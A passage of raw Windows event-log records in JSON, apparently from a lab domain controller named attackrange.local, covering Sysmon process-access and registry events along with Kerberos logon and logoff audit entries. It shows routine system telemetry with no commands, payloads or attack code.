{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.332\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010377D0400}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.332","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010377D0400}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76838,"ProcessID":852,"ThreadID":940,"Channel":"System","Message":"The NcaSvc service entered the stopped state.","param1":"NcaSvc","param2":"stopped","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.348\r\nSourceProcessGUID: {E2A3D6B1-1083-5F25-0000-0010377D0400}\r\nSourceProcessId: 4276\r\nSourceThreadId: 4304\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.348","SourceProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010377D0400}","SourceProcessId":"4276","SourceThreadId":"4304","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220313,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40800000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"WIN-DC-8400769$@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40800000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{14023241-E16F-A00A-7B8B-1F9FCC4C37BD}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220314,"ProcessID":864,"ThreadID":1260,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47FC4\r\n\r\nPrivileges:\t\tSeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x47fc4","PrivilegeList":"SeAuditPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeAssignPrimaryTokenPrivilege","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220315,"ProcessID":864,"ThreadID":1260,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x47FC4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t49709\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x47fc4","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"49709","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220316,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x47FC4\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x47fc4","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.348\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.348","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.364\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1684\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1083-5F25-0000-0010797B0400}\r\nTargetProcessId: 4264\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.364","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1684","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1083-5F25-0000-0010797B0400}","TargetProcessId":"4264","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\ProfileName\r\nDetails: attackrange.local","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\ProfileName","Details":"attackrange.local","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Description\r\nDetails: attackrange.local","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Description","Details":"attackrange.local","EventReceivedTime":"2020-08-01 06:49:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":2563,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: \r\nEventType: SetValue\r\nUtcTime: 2020-08-01 06:49:39.410\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Managed\r\nDetails: DWORD (0x00000001)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.410","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Profiles\\{7A8EBEEC-93C3-4561-8C0D-FB16C9EDE144}\\Managed","Details":"DWORD 